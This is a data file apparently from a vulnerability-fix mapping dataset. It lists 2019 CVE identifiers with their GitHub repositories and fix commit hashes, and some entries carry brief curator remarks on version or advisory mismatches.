-CVE-2019-1001;https://github.com/chakra-core/ChakraCore;None:None;False;75162b7f2d8ac2b37d17564e9c979ba1bae707e8,f8a6b80b4e5f7caeb7d3a61fe6836ebf69cfff85; -CVE-2019-1052;https://github.com/chakra-core/ChakraCore;None:None;False;66ab97c09c49c631234c0ec202b0822d0c2833cc; -CVE-2019-1062;https://github.com/microsoft/ChakraCore;None:None;False;7f0d390ad77d838cbb81d4586c83ec822f384ce8; -CVE-2019-1092;https://github.com/chakra-core/ChakraCore;None:None;False;d4e767fb946128c135d77edda7a794561e1c1f06; -CVE-2019-1103;https://github.com/chakra-core/ChakraCore;None:None;False;efab3101028045cbfa0cc21bd852f75bcc037dba; -CVE-2019-1106;https://github.com/chakra-core/ChakraCore;None:None;False;362e96537af207be3ecf7fa32f338229ee1dcc46; -CVE-2019-1107;https://github.com/chakra-core/ChakraCore;None:None;False;214dec9461f9acb9a4b9004368d2a81e0c125652; -CVE-2019-1139;https://github.com/microsoft/ChakraCore;None:None;False;ae8a8d9644e677a9878e5dd7824d4b876454e799; -CVE-2019-1195;https://github.com/microsoft/ChakraCore;None:None;False;c70af488e435ebd552f3da0547dee39dc8437a64; Same comment than CVE-2019-1197 (different fix commit) -CVE-2019-1196;https://github.com/microsoft/ChakraCore;None:None;False;dce7443ae45f82eceec3284974610e1a1bbe6792; Same comment than CVE-2019-1197 (different fix commit) -CVE-2019-1197;https://github.com/microsoft/ChakraCore;None:None;False;bf52b6cfa96d6395046d0aaf87396cd7ca13f6cb; It was easier to find the fix (bf52b6c) with google than the fixed version. -CVE-2019-1552;https://github.com/openssl/openssl;None:None;False;e32bc855a81a2d48d215c506bdeb4f598045f7e9,d333ebaf9c77332754a9d5e111e2f53e1de54fdd,b15a19c148384e73338aa7c5b12652138e35ed28,54aa9d51b09d67e90db443f682cface795f5af9e; -CVE-2019-3465;https://github.com/robrichards/xmlseclibs;None:None;False;8624602cce5175986ae5df87b6ea9596b742c7f9,46fa8b5a4fee597fece67773601e8b9dde7cb7df,118450a141ac2336be1b5e5e91a22229441b0277,0a53d3c3aa87564910cae4ed01416441d3ae0db5; -CVE-2019-3498;https://github.com/django/django;None:None;False;64d2396e83aedba3fcc84ca40f23fbd22f0b9b5b,1cd00fcf52d089ef0fe03beabd05d59df8ea052a,1ecc0a395be721e987e8e9fdfadde952b6dee1c7,9f4ed7c94c62e21644ef5115e393ac426b886f2e; -CVE-2019-3564;https://github.com/facebook/fbthrift;None:None;False;c461c1bd1a3e130b181aa9c854da3030cd4b5156; -CVE-2019-3772;https://github.com/spring-projects/spring-integration;None:None;False;59c69ed40d3755ef59f80872e0ea711adbb13620; -CVE-2019-3774;https://github.com/spring-projects/spring-batch;None:None;False;8dc3bb7d3c3d0b1487e3ef3dcbdebda865d2b20e,c7930184ee4513d548940550c4eb5eeef028cb64,a6d8ac1b44afeca1bb572718ceacac774a368422; -CVE-2019-3792;https://github.com/concourse/concourse;None:None;False;dc3d15ab6c3a69890c9985f9c875d4c2949be727; -CVE-2019-3799;https://github.com/spring-cloud/spring-cloud-config;None:None;False;3632fc6f64e567286c42c5a2f1b8142bfde505c2,9617f2922ee2ae27f08676716224933f0d869719,90e8a81f6fa921e034cecb79cd100f343f7714af,d3e21866a5f192fa2582349cb3732ad0e4b8850b; -CVE-2019-3808;https://github.com/moodle/moodle;None:None;False;cfde0b8d38061f370a5c21523c2188aca5a7160d,6360f87cdca744a6a71c315853f6d811a3e54e26,9ca8ccbefc3e1f56621c866f3af69bdb6cc98a15,3d2783690da2281e5e360c40961cd6846e1dbbb8; -CVE-2019-3810;https://github.com/moodle/moodle;None:None;False;14f9bad3cebf1aa6bb73be48020653e1f792dc29,2e057f082d622b09a33fd32aff3b4d275aed04dc; -CVE-2019-3826;https://github.com/prometheus/prometheus;None:None;False;b03d6f6eff8283bd7cb063edc21041d3fb6c9878; just CHANGELOG.md -CVE-2019-3847;https://github.com/moodle/moodle;None:None;False;a37e26d2efe1ca0e4d8d69c611a748af35b33674,070f24d006eab6b958eb083530de159b43c538ed,e836242e1c04cd62d0afa4a790074fd245628e7a,93dda3bfd3caaaa8d23fe8ede543f27ef774958d,ec3b63c772d6448765c68268234cf36c1a91bcac; -CVE-2019-3850;https://github.com/moodle/moodle;None:None;False;5d87464bc6283e72969cd251ce4f399aacebd608,d3f2f990dd3c5d4e6073a77154c6423d1c304647,907b377e51c32ea37feef53e10684b504e103273,1fc481dd7b09e08e85824c1fe6733b303a36bdce,772c908d40a944efd91d897d524b255626d330d4; -CVE-2019-3888;https://github.com/undertow-io/undertow;None:None;False;20cacc96c0594f4f4f9bb1cc2b93a77b6be3f74c,9bf05b765e222dd106fee9b46314061b18b7275e; was 2.0.20:2.0.21 -CVE-2019-3894;https://github.com/wildfly/wildfly;None:None;False;84975f8a4dd5f243c7ff5122c0d36783b116a0d7,936d0b0284288c837464229a255e2cdf1e10132d; -CVE-2019-5018;https://github.com/sqlite/sqlite;None:None;False;4ded26a53c4df312e9fd06facbbf70377e969983; repo was wrong wtf, only debian says the correct fixed version -CVE-2019-5413;https://github.com/expressjs/morgan;None:None;False;e329663836809de4be557b200a5b983ab8b4e6c2; -CVE-2019-5421;https://github.com/heartcombo/devise;None:None;False;36690f33a44a489e649022f0c56f41a38020414b,fb48336709bc1a29ff15b7170ed7b33906c66888,62703943bef75aba09ec3e346aba4c9159300ecd; -CVE-2019-5444;https://github.com/ChristoPy/serve-here.js;None:None;False;cefb51d03290b6a88dd13143ab2de31b8cf57c39; -CVE-2019-5448;https://github.com/yarnpkg/yarn;None:None;False;2f08a7405cc3f6fe47c30293050bb0ac94850932,c10ef6ab60f0bc80f65838d675325f6c17f04f24; -CVE-2019-5477;https://github.com/sparklemotion/nokogiri;None:None;False;5fe449fd3ab8cc25a71499128529c821c10dde83,daffe223967b74b3205513b5e600aa5dfefe687d,6777008202c1bde0520bb09fd1f02dee64dbcb60; -CVE-2019-5479;https://github.com/larvit/larvitbase-api;None:None;False;0e953337e75770abdcc0a8bb71932a44d2239514; -CVE-2019-5484;https://github.com/bower/bower;None:None;False;45c6bfa86f6e57731b153baca9e0b41a1cc699e3; -CVE-2019-5884;https://github.com/Studio-42/elFinder;None:None;False;f133163f2d754584de65d718b2fde96191557316; -CVE-2019-6798;https://github.com/phpmyadmin/phpmyadmin;None:None;False;469934cf7d3bd19a839eb78670590f7511399435; -CVE-2019-6802;https://github.com/pypiserver/pypiserver;None:None;False;1375a67c55a9b8d4619df30d2a1c0b239d7357e6,0284cb7f50b037688efdc4fb8de83878eedbe724; -CVE-2019-6975;https://github.com/django/django;None:None;False;0bbb560183fabf0533289700845dafa94951f227,83ab3e26647f6a50cdfac01ecf735cad540b2f35,40cd19055773705301c3428ed5e08a036d2091f3,1f42f82566c9d2d73aff1c42790d6b1b243f7676,402c0caa851e265410fbcaa55318f22d2bf22ee2; -CVE-2019-7164;https://github.com/sqlalchemy/sqlalchemy;None:None;False;30307c4616ad67c01ddae2e1e8e34fabf6028414; -CVE-2019-7313;https://github.com/buildbot/buildbot;None:None;False;bdae9fea4e8978b19e12425776b2d083febd91a6,f0ccd5fd572ea8223b48bd57d8c2548b2f7d3ecf,e781f110933e05ecdb30abc64327a2c7c9ff9c5a; -CVE-2019-7537;https://github.com/pytroll/donfig;None:None;False;6332fa354f1c7d6fb126a0666be8f23adbc2fcf7,a57e36e14f32bfb48d8a1953b375ed22a35ef186; -CVE-2019-7548;https://github.com/sqlalchemy/sqlalchemy;None:None;False;30307c4616ad67c01ddae2e1e8e34fabf6028414; -CVE-2019-7617;https://github.com/elastic/apm-agent-python;None:None;False;47286d746e05897c6b3af8d465aa56ab1ed8d678; -CVE-2019-7644;https://github.com/auth0/auth0-aspnet;None:None;False;69b0a09e2f3e350ca9f6cc2cc99d0219b4f248c1,870eb4b52696cf6e530b28e74f32167df35a3f12; this repo has no tag -CVE-2019-7722;https://github.com/pmd/pmd;None:None;False;e295711343cc155cb64ea0ae29ce9d69201469b3; -CVE-2019-8331;https://github.com/twbs/bootstrap;None:None;False;7bc4d2e0bc65151b6f60dccad50c9c8f50252bd6; -CVE-2019-8457;https://github.com/sqlite/sqlite;None:None;False;e41fd72acc7a06ce5a6a7d28154db1ffe8ba37a8; -CVE-2019-8903;https://github.com/totaljs/framework;None:None;False;de16238d13848149f5d1dae51f54e397a525932b,c37cafbf3e379a98db71c1125533d1e8d5b5aef7,4d7abbcdc34d6d1287338936f418c1eb1bc41201; -CVE-2019-9153;https://github.com/openpgpjs/openpgpjs;None:None;False;327d3e5392a6f59a4270569d200c7f7a2bfc4cbc,0be91133665e81d2007cdfa02cd3cf1d839ee4f1; -CVE-2019-9154;https://github.com/openpgpjs/openpgpjs;None:None;False;0be91133665e81d2007cdfa02cd3cf1d839ee4f1,47138eed61473e13ee8f05931119d3e10542c5e1; -CVE-2019-9155;https://github.com/openpgpjs/openpgpjs;None:None;False;1dd168e7a2ce6f9ba0fddf5d198e21baca9c042d; unknown tags -CVE-2019-9212;https://github.com/sofastack/sofa-hessian;None:None;False;285b071d89c8dac21d32983e54f3a8788ca34c12; -CVE-2019-9512;https://github.com/golang/go;None:None;False;5c379a437e904eb1f94296fa9d45276cd6e4f5a9,7139b45d1410ded14e1e131151fd8dfc435ede6c,145e193131eb486077b66009beb051aba07c52a5,e152b01a468a1c18a290bf9aec52ccea7693c7f2; This is a generic protocol vuln, it is not golang/go, check the advisory and re-run -CVE-2019-9658;https://github.com/checkstyle/checkstyle;None:None;False;180b4fe37a2249d4489d584505f2b7b3ab162ec6; -CVE-2019-9826;https://github.com/phpbb/phpbb;None:None;False;3075d2fecc9f5bb780bb478c0851a704c7f9b392,fd195fba210c8625e968ef5553e61864747c8d44,da9910850a168f73c6b8dd8407a01f47d27ca1d8,56060caa4c44620929b6e17fe4622343750ad302; -CVE-2019-9844;https://github.com/Khan/simple-markdown;None:None;False;8ad751f8333ce136d1a0a120d78596a30eb1e1d9; -CVE-2019-9942;https://github.com/twigphp/Twig;None:None;False;eac5422956e1dcca89a3669a03a3ff32f0502077,ad7d27425dffc763644de93da2262f69478c691b,0f3af98ef6e71929ad67fb6e5f3ad65777c1c4c5; -CVE-2019-10071;https://github.com/apache/tapestry-5;None:None;False;cdcf49c0a2b36ffc7a004d54405bb4357870c4b2; fixed tag is vulnerable -CVE-2019-10072;https://github.com/apache/tomcat;None:None;False;0bcd69c9dd8ae0ff424f2cd46de51583510b7f35,8d14c6f21d29768a39be4b6b9517060dc6606758,7f748eb6bfaba5207c89dbd7d5adf50fae847145,ada725a50a60867af3422c8e612aecaeea856a9a; -CVE-2019-10077;https://github.com/apache/jspwiki;None:None;False;87c89f0405d6b31fc165358ce5d5bc4536e32a8a; -CVE-2019-10086;https://github.com/apache/commons-beanutils;None:None;False;62e82ad92cf4818709d6044aaf257b73d42659a4,dd48f4e589462a8cdb1f29bbbccb35d6b0291d58; -CVE-2019-10089;https://github.com/apache/jspwiki;None:None;False;2956ccb307dd4b23b25c8ddeae8d7e7b301c6ff3; -CVE-2019-10090;https://github.com/apache/jspwiki;None:None;False;139746f7c25b84049437d1d9eed9456446a08bf7; -CVE-2019-10094;https://github.com/apache/tika;None:None;False;b8655aad5efaef1c5d266676350f58743770fb5b,426be73b9e7500fa3d441231fa4e473de34743f6,c4e63c9be8665cccea8b680c59a6f5cfbc03e0fc,81c21ab0aac6b3e4102a1a8906c8c7eab6f,1158d893dc952c573f7a12c7e4855cdce479fc2a,22ff7564f2641ba195f192d7c59e9df4a3a10747; -CVE-2019-10131;https://github.com/ImageMagick/ImageMagick;None:None;False;cb1214c124e1bd61f7dd551b94a794864861592e; -CVE-2019-10154;https://github.com/moodle/moodle;None:None;False;2904a7f851da8e66be12f41d55068bf07817fbd6,a3d19efab4aff83c07db9f0ad34c8f0e1f29c64c; -CVE-2019-10157;https://github.com/keycloak/keycloak-nodejs-connect;None:None;False;55e54b55d05ba636bc125a8f3d39f0052d13f8f6; -CVE-2019-10158;https://github.com/infinispan/infinispan;None:None;False;4b381c5910265972ccaabefbdbd16a2b929f6b72,7341da552a13cb9e8a44cd13c984d1f46310653e,245a0d0b169001e5a22c0ec9903942e617c0743f,debdf5447da3626d2f970050ca79cdf98bf87661; -CVE-2019-10174;https://github.com/infinispan/infinispan;None:None;False;a7dab68d194989aaa0b0aa0781cf8ee88fbe3439,7bdc2822ccf79127a488130239c49a5e944e3ca2; -CVE-2019-10184;https://github.com/undertow-io/undertow;None:None;False;5fa7ac68c0e4251c93056d9982db5e794e04ebfa,d2715e3afa13f50deaa19643676816ce391551e9; -CVE-2019-10206;https://github.com/ansible/ansible;None:None;False;d39488ece44956f6a169a498b067bbef54552be1,d728127310b4f3a40ce8b9df3affb88ffaeea073,e9a37f8e3171105941892a86a1587de18126ec5b,4b5aed4e5af4c7aab621662f50a289e99b8ac393; -CVE-2019-10217;https://github.com/ansible/ansible;None:None;False;c1ee1f142db1e669b710a65147ea32be47a91519; -CVE-2019-10219;https://github.com/hibernate/hibernate-validator;None:None;False;20d729548511ac5cff6fd459f93de137195420fe,124b7dd6d9a4ad24d4d49f74701f05a13e56ceee; -CVE-2019-10240;https://github.com/eclipse/hawkbit;None:None;False;fa6520a094a24897035dae4a3af2a69d174c7f9d; -CVE-2019-10241;https://github.com/eclipse/jetty.project;None:None;False;ca77bd384a2970cabbbdab25cf6251c6fb76cd21; -CVE-2019-10246;https://github.com/eclipse/jetty.project;None:None;False;3d028ab2ca76086a742bac7409a3620e81ec4791,1565b5f160e600d08da9b00edf081fb353a443d9,7b774d82e8234231e99b33c19acac3b6f83c0377; -CVE-2019-10247;https://github.com/eclipse/jetty.project;None:None;False;04c994712c0b29824633598cfe0bf709f3b96f09,a15534d72c0c8d84cb821c767343a91584a4fecb,6d847d4a73b34b8c19f43dcf221eefe6859b7d55,b0f72a87d5b35ff0a814143fb1725f7c6fc4e0d7,99f3926d0546032814077cf0d0a684ed80e7bb08,d983890d1769744e7da865de7ff34065fe491a28,9f506e4123b519adccb7df3599441f55daaff31e,5ef8a8abfa63b26a6f978200519730f964ebee0b; -CVE-2019-10248;https://github.com/eclipse/vorto;None:None;False;f15b81fb76b214fe40be164dfb730434ef49ec35; -CVE-2019-10249;https://github.com/eclipse/xtext-xtend;None:None;False;f34464b117bd38e8b844b01d94cf5b072b07f6ec,169de2cecc50ed9bf81c3cdc496ad8a799bdf17b; -CVE-2019-10255;https://github.com/jupyter/notebook;None:None;False;b9d9e659e9b2edd70767129c06ac76761e046791,b981c5b055041c036e05e735694c60863075247d,70fe9f0ddb3023162ece21fbb77d5564306b913b,08c4c898182edbe97aadef1815cce50448f975cb; -CVE-2019-10354;https://github.com/jenkinsci/jenkins;None:None;False;279d8109eddb7a494428baf25af9756c2e33576b; commit timestamp is outside the time interval -CVE-2019-10641;https://github.com/contao/contao;None:None;False;b92e27bc7c9e59226077937f840c74ffd0f672e8,74c7dfafa0dfa5363a9463b486522d5d526e28fe; -CVE-2019-10642;https://github.com/contao/contao;None:None;False;ee2c8130c2e68a1d0d2e75bd6b774c4393942b15; -CVE-2019-10643;https://github.com/contao/contao;None:None;False;70348cc812b110831ad66a4f9857883f75649b88; missing exact subversions (says only 4.7) -CVE-2019-10682;https://github.com/relekang/django-nopassword;None:None;False;d8b4615f5fbfe3997d96cf4cb3e342406396193c; -CVE-2019-10745;https://github.com/jonschlinkert/assign-deep;None:None;False;90bf1c551d05940898168d04066bbf15060f50cc; commit has no tags -CVE-2019-10748;https://github.com/sequelize/sequelize;None:None;False;a72a3f50bad7772ce96fc62d80f64b109fb2893f; -CVE-2019-10749;https://github.com/sequelize/sequelize;None:None;False;ee4017379db0059566ecb5424274ad4e2d66bc68; -CVE-2019-10750;https://github.com/alexindigo/deeply;None:None;False;6eccb2f03ec8d3eefc6805053c4cc2a36aab1505; -CVE-2019-10751;https://github.com/httpie/httpie;None:None;False;df36d6255df5793129b02ac82f1010171bd8a0a8; Repo changed in the meantime -CVE-2019-10752;https://github.com/sequelize/sequelize;None:None;False;9bd0bc111b6f502223edf7e902680f7cc2ed541e; -CVE-2019-10754;https://github.com/apereo/cas;None:None;False;40bf278e66786544411c471de5123e7a71826b9f; commit timestamp is outside the time interval -CVE-2019-10756;https://github.com/node-red/node-red-dashboard;None:None;False;870382792f679b0a6bbf45b29ca7f6428e51623b; -CVE-2019-10757;https://github.com/knex/knex;None:None;False;988fb243898d746a759d422762685a79eddf99ca; -CVE-2019-10760;https://github.com/commenthol/safer-eval;None:None;False;1c29f6a6e304fb650c05056e217e457a0d2cc3c5; -CVE-2019-10762;https://github.com/catfan/Medoo;None:None;False;659864b393961bf224bba1efc03b7dcbed7de533; -CVE-2019-10763;https://github.com/pimcore/pimcore;None:None;False;9182f03c80bb7f08aae4efd4a0788e2be6368d96,608ef5d81ba34d034c9b70519bbc6806ad115d68; -CVE-2019-10764;https://github.com/simplito/elliptic-php;None:None;False;15652609aa55968d56685c2a9120535ccdc00fd9; -CVE-2019-10766;https://github.com/usmanhalalit/pixie;None:None;False;9bd991021abbcbfb19347a07dca8b7e518b8abc9,747dd46a967de4e9a944c56f7597e2a2378829c6; -CVE-2019-10767;https://github.com/ioBroker/ioBroker.js-controller;None:None;False;f6e292c6750a491a5000d0f851b2fede4f9e2fda; -CVE-2019-10768;https://github.com/angular/angular.js;None:None;False;add78e62004e80bb1e16ab2dfe224afa8e513bc3,e242e9b5952edcb5c362b80e77a30379d565cf8f,726f49dcf6c23106ddaf5cfd5e2e592841db743a; -CVE-2019-10770;https://github.com/ratpack/ratpack;None:None;False;c1d4357bbc4bceb24abb156fbb471257a0177eb6,a3cbb13be1527874528c3b99fc33517c0297b6d3; -CVE-2019-10771;https://github.com/ioBroker/ioBroker.web;None:None;False;24ebb6d3714feac87570ce7a2e827fd2f91aa043; -CVE-2019-10773;https://github.com/yarnpkg/yarn;None:None;False;039bafd74b7b1a88a53a54f8fa6fa872615e90e7,8cd85c9c463fb75df0621fc256126dca169bdc3f,85d8d79892e967f6529716a05cb4a9bc9769f811,ef69693037865be3389ac470de8a4891ec4faf18,35a884ec448b4cad193feb08aa9ff20e7397894d,752ce39e0de09df42f17dc982b18f91c8130e613,cefe4c529816f94cfefbb78c1b0d16d7da895b64; -CVE-2019-10774;https://github.com/mikehaertl/php-shellcommand;None:None;False;8d98d8536e05abafe76a491da87296d824939076,c2ef7dbdb38a0a477394975097655c00adec97c4; -CVE-2019-10776;https://github.com/kellyselden/git-diff-apply;None:None;False;106d61d3ae723b4257c2a13e67b95eb40a27e0b5; -CVE-2019-10777;https://github.com/awspilot/cli-lambda-deploy;None:None;False;0985a18bffb265817bc84836c9a65f2bb04a51ac; -CVE-2019-10778;https://github.com/guybedford/devcert;None:None;False;571f4e6d077f7f21c6aed655ae380d85a7a5d3b8; -CVE-2019-10780;https://github.com/inukshuk/bibtex-ruby;None:None;False;14406f4460f4e1ecabd25ca94f809b3ea7c5fb11; -CVE-2019-10781;https://github.com/schema-inspector/schema-inspector;None:None;False;345a7b2eed11bb6128421150d65f4f83fdbb737d; -CVE-2019-10787;https://github.com/Turistforeningen/node-im-resize;None:None;False;de624dacf6a50e39fe3472af1414d44937ce1f03; -CVE-2019-10792;https://github.com/diegohaz/bodymen;None:None;False;5d52e8cf360410ee697afd90937e6042c3a8653b; -CVE-2019-10793;https://github.com/rhalff/dot-object;None:None;False;f76cff5fe6d01d30ce110d8f454db2e5bd28a7de; -CVE-2019-10795;https://github.com/remy/undefsafe;None:None;False;f272681b3a50e2c4cbb6a8533795e1453382c822; -CVE-2019-10797;https://github.com/wso2/transport-http;None:None;False;4a4dc99c7b259646ee5e23b7aaa7c3a8bac959c1; my bad i used two times 6.3.1 -CVE-2019-10799;https://github.com/eiskalteschatten/compile-sass;None:None;False;d9ada7797ff93875b6466dea7a78768e90a0f8d2; -CVE-2019-10806;https://github.com/vega/vega;None:None;False;27881f21af7d51fe0dc2fdbd92eabd34974310f1,8f33a0b5170d7de4f12fc248ec0901234342367b; -CVE-2019-10867;https://github.com/pimcore/pimcore;None:None;False;38a29e2f4f5f060a73974626952501cee05fda73; -CVE-2019-10874;https://github.com/bolt/bolt;None:None;False;127434d79990b54abfb3e830243deaf725baa4de,91187aef36363a870d60b0a3c1bf8507af34c9e4; -CVE-2019-10904;https://github.com/roundup-tracker/roundup;None:None;False;a2edc3cba0b5d34005114f6da0251bd9ac2837df; -CVE-2019-10912;https://github.com/symfony/symfony;None:None;False;4fb975281634b8d49ebf013af9e502e67c28816b,d140648929b296ee5b27cbcf407672b3ae3980dc,4b18b32133d889cce605aa15242251bf485895de,b224d4f012dbd8c53cecb22254642e7e1fb70f40,d77e44569785329702ea55ead8938776080989b7; -CVE-2019-11016;https://github.com/Elgg/Elgg;None:None;False;482d19801fc0149f8605604415e90e69333c6347,bd194d1baa89ca271411b74569bcd806b9fa62e6; -CVE-2019-11082;https://github.com/dkpro/dkpro-core;None:None;False;6bdca97de39983083e400cb8715c019fe508b912,ceb749a82e15dc538793ae3fa0c06826dadbde24,0d7048e7130ddc901445281b777207d97f74e664,b7ab1ed62466fbbb852f8c97bdb888e2be10c2eb,0371975bab12f8f94e2f3c655922a360c76b7519,9c4c5d579355d2f9c5dc16eade0bc046be233035; -CVE-2019-11244;https://github.com/kubernetes/kubernetes;None:None;False;730bc968b95842022c4c81d607bf6411b459a675,f228ae3364729caed59087e23c42868454bc3ff4,b83756b3181f464720bfb468a171a58fc110c3e8,f6cee7a330a3b6f67701da4d0e76e65aa02a9159,4ccdc8b71b2790b2853b3ac43cdda623f8b22b12,6e4df6a7f27ecadbdec06fe92d915faabee33300,211b1ada57ae0b85dd08c4c353c90305fa1f14c9,8bebb336d0dfa07c70f92ca81fd88986d2a3192b; fixed version is vulnerable -CVE-2019-11245;https://github.com/kubernetes/kubernetes;None:None;False;7d58a4985dc157952a4f38f544a80ce4bf019471,9bba83f2c2e3a2432943fc2ee987cb7f264d9449,6c1b3b4f623b35a11a298194810078f4093c13f2,02026415cdc49b4ceb1b70e0410a93b57885851e,78254d555a2958483780818ac83f899ff9aa6296,91e593546c8396d6b764ff0832483411f5a3f3d3; example-case of uselesness of prospector, the issue mentioned in the advisory leads to all the right commits -CVE-2019-11269;https://github.com/spring-projects/spring-security-oauth;None:None;False;cb714f4cee45ce2807320ded38ed0bee846f2397,346bb74d28d7292afa30ce538c68cabc51d91777,1434dcf0c731dd1ee50d52520b1e24c15eb1f009,f769ff98c7b0c7aba42dd67538f6912c8e0d2ef7; -CVE-2019-11272;https://github.com/spring-projects/spring-security;None:None;False;b2d4fec3617c497c5a8eb9c7e5270e0c7db293ee; -CVE-2019-11289;https://github.com/cloudfoundry/gorouter;None:None;False;b1b5c44e050f73b399b379ca63a42a2c5780a83f; -CVE-2019-11325;https://github.com/symfony/symfony;None:None;False;d446d7733abd8807ff43e7a689065e6ebc48e32a,0524868cbf3d3a36e0af804432016d5a6d98169a; -CVE-2019-11328;https://github.com/hpcng/singularity;None:None;False;b4dcb0e4d77baa1c7647a4a5705ea824bb4e0dca; vulnerable tag is fixed -CVE-2019-11358;https://github.com/jquery/jquery;None:None;False;753d591aea698e57d6db58c9f722cd0808619b1b; -CVE-2019-11405;https://github.com/OpenAPITools/openapi-generator;None:None;False;cce35d75a4e69d09ec81ff1ece637d39b0f6f00e,54d9c19c7707285d7b3f9749762a5cf1a9c4336c; -CVE-2019-11458;https://github.com/cakephp/cakephp;None:None;False;1a74e798309192a9895c9cedabd714ceee345f4e,c25b91bf7c72db43c01b47a634fd02112ff9f1cd,81412fbe2cb88a304dbeeece1955bc0aec98edb1,2434f9ba4740759bf10947fbb5d3ebccce8e5cb9; -CVE-2019-11470;https://github.com/ImageMagick/ImageMagick;None:None;False;e3cdce6fe12193f235b8c0ae5efe6880a25eb957,fedaa752e53f37258139fcc8802aad426f111bc0; -CVE-2019-11512;https://github.com/contao/contao;None:None;False;87d92f823b08b91a0aeb522284537c8afcdb8aba; -CVE-2019-11514;https://github.com/flarum/core;None:None;False;66607a56749339d50620b049701ad4d6a4dafbd7; -CVE-2019-11767;https://github.com/phpbb/phpbb;None:None;False;dc5a167c429a3813d66b0ae3d14242650466cac6; -CVE-2019-11768;https://github.com/phpmyadmin/phpmyadmin;None:None;False;c1ecafc38319e8f768c9259d4d580e42acd5ee86; -CVE-2019-11777;https://github.com/eclipse/paho.mqtt.java;None:None;False;a0bbf1e7da158ae191582f032343c6171e6a0b44; -CVE-2019-11808;https://github.com/ratpack/ratpack;None:None;False;7b2f09eeeba1e460ad8702930a8a8933a2dbe1e9,f2b63eb82dd71194319fd3945f5edf29b8f3a42d; -CVE-2019-12041;https://github.com/jonschlinkert/remarkable;None:None;False;30e2bf05c12bbb12f04ffa0544df475d1ccc18d2,287dfbf22e70790c8b709ae37a5be0523597673c; -CVE-2019-12086;https://github.com/FasterXML/jackson-databind;None:None;False;d30f036208ab1c60bd5ce429cb4f7f1a3e5682e8,efc3c0d02f4743dbaa6d1b9c466772a2f13d966b,dda513bd7251b4f32b7b60b1c13740e3b5a43024; -CVE-2019-12203;https://github.com/silverstripe/silverstripe-framework;None:None;False;a6763298fef6b876597c3170c7aef710a62bb55c,eccfa9b10d246d741de2fa83d502339d45068983,569237c0f4d16ac6f927aeb0ed8c9b8787490080,a86093fee6398881889d6d330a15f7042be25bff; fixed version is vulnerable -CVE-2019-12245;https://github.com/silverstripe/silverstripe-assets;None:None;False;1df69c4a4d6258ebe5c4030fd7c78c6a75e94167,73e0cc69dc499c24aa706af9eddd8a2db2ac93e0; wrong advisory version -CVE-2019-12277;https://github.com/blogifierdotnet/Blogifier;None:None;False;3e2ae11f6be8aab82128f223c2916fab5a408be5; -CVE-2019-12308;https://github.com/django/django;None:None;False;c238701859a52d584f349cce15d56c8e8137c52b,deeba6d92006999fee9adfbd8be79bf0a59e8008,afddabf8428ddc89a332f7a78d0d21eaf2b5a673,09186a13d975de6d049f8b3e05484f66b01ece62; -CVE-2019-12313;https://github.com/dollarshaveclub/shave;None:None;False;1876911e423c00fdda643ef724d956b3d324d5c2,da7371b0531ba14eae48ef1bb1456a3de4cfa954; -CVE-2019-12387;https://github.com/twisted/twisted;None:None;False;8a473397d5cdecff38b95a94fc7fc75dd06217dc,6c61fc4503ae39ab8ecee52d10f10ee2c371d7e2; The nvd advisory links a commit having the cve in the message but the oldest tag is twisted-19.7.0 -CVE-2019-12402;https://github.com/apache/commons-compress;None:None;False;4ad5d80a6272e007f64a6ac66829ca189a8093b9; -CVE-2019-12404;https://github.com/apache/jspwiki;None:None;False;d71ecf657ef3366f1790d9f09364812c78f7f8c2; -CVE-2019-12405;https://github.com/apache/trafficcontrol;None:None;False;f780aff77a52d52a37b4d1cc3e8e801c0b557356,54f105dfd6069945ec12c89d965532e6f5185935; -CVE-2019-12407;https://github.com/apache/jspwiki;None:None;False;f43ac386c8cd3e5fed7069e8fc8286668c86b5f8; -CVE-2019-12418;https://github.com/apache/tomcat;None:None;False;a91d7db4047d372b2f12999d3cf2bc3254c20d00,1fc9f589dbdd8295cf313b2667ab041c425f99c3,bef3f40400243348d12f4abfe9b413f43897c02b; -CVE-2019-12419;https://github.com/apache/cxf;None:None;False;6bf89927d3e07197d49453b00d673eadce696cf9,db6069667708a59c75a785f310d4a2df3698122c,661c271f4890b05896eee5de9cb8fb503fb3bccb; -CVE-2019-12422;https://github.com/apache/shiro;None:None;False;44f6548b97610cdf661976969d5735c0be14a57b,a8018783373ff5e5210225069c9919e071597d5e; -CVE-2019-12423;https://github.com/apache/cxf;None:None;False;8b40fdba289c62f4defae51c1f76860f0159c441,2de7e14eb95626fffef6f61365186de9a1c9de3d; -CVE-2019-12616;https://github.com/phpmyadmin/phpmyadmin;None:None;False;015c404038c44279d95b6430ee5a0dddc97691ec; -CVE-2019-12617;https://github.com/silverstripe/silverstripe-framework;None:None;False;8b7063a8e2773e2bbec3cabf94ed86e11f607071,5af205993d24b4bafc00dea94efc2c31305bca83; fixed version is vulnerable -CVE-2019-12741;https://github.com/hapifhir/hapi-fhir;None:None;False;8f41159eb147eeb964cad68b28eff97acac6ea9a; -CVE-2019-12748;https://github.com/TYPO3/TYPO3.CMS;None:None;False;4c003f80b8b25def173268b8b069446c4fcc313a,96105753aa6a61397ea47dc6fbe23f1f994fe32e,6dcbf981f89bed5826e3e284e0441d8e3a50bae6; -CVE-2019-12781;https://github.com/django/django;None:None;False;54d0f5e62f54c29a12dd96f44bacd810cbe03ac8,77706a3e4766da5d5fb75c4db22a0a59a28e6cd6,32124fc41e75074141b05f10fc55a4f01ff7f050,1e40f427bb8d0fb37cc9f830096a97c36c97af6f; -CVE-2019-12814;https://github.com/FasterXML/jackson-databind;None:None;False;5f7c69bba07a7155adde130d9dee2e54a54f1fa5; -CVE-2019-13127;https://github.com/jgraph/mxgraph;None:None;False;76e8e2809b622659a9c5ffdc4f19922b7a68cfa3; -CVE-2019-13135;https://github.com/ImageMagick/ImageMagick;None:None;False;cdb383749ef7b68a38891440af8cc23e0115306d; -CVE-2019-13173;https://github.com/npm/fstream;None:None;False;6a77d2fa6e1462693cf8e46f930da96ec1b0bb22; -CVE-2019-13209;https://github.com/rancher/rancher;None:None;False;0ddffe484adccb9e37d9432e8e625d8ebbfb0088; -CVE-2019-13295;https://github.com/ImageMagick/ImageMagick;None:None;False;a7759f410b773a1dd57b0e1fb28112e1cd8b97bc; -CVE-2019-13574;https://github.com/minimagick/minimagick;None:None;False;4cd5081e58810d3394d27a67219e8e4e0445d851; -CVE-2019-13644;https://github.com/firefly-iii/firefly-iii;None:None;False;def307010c388c4e92d7066671ad62e477cc087a; advisory link is a first uncomplete fix 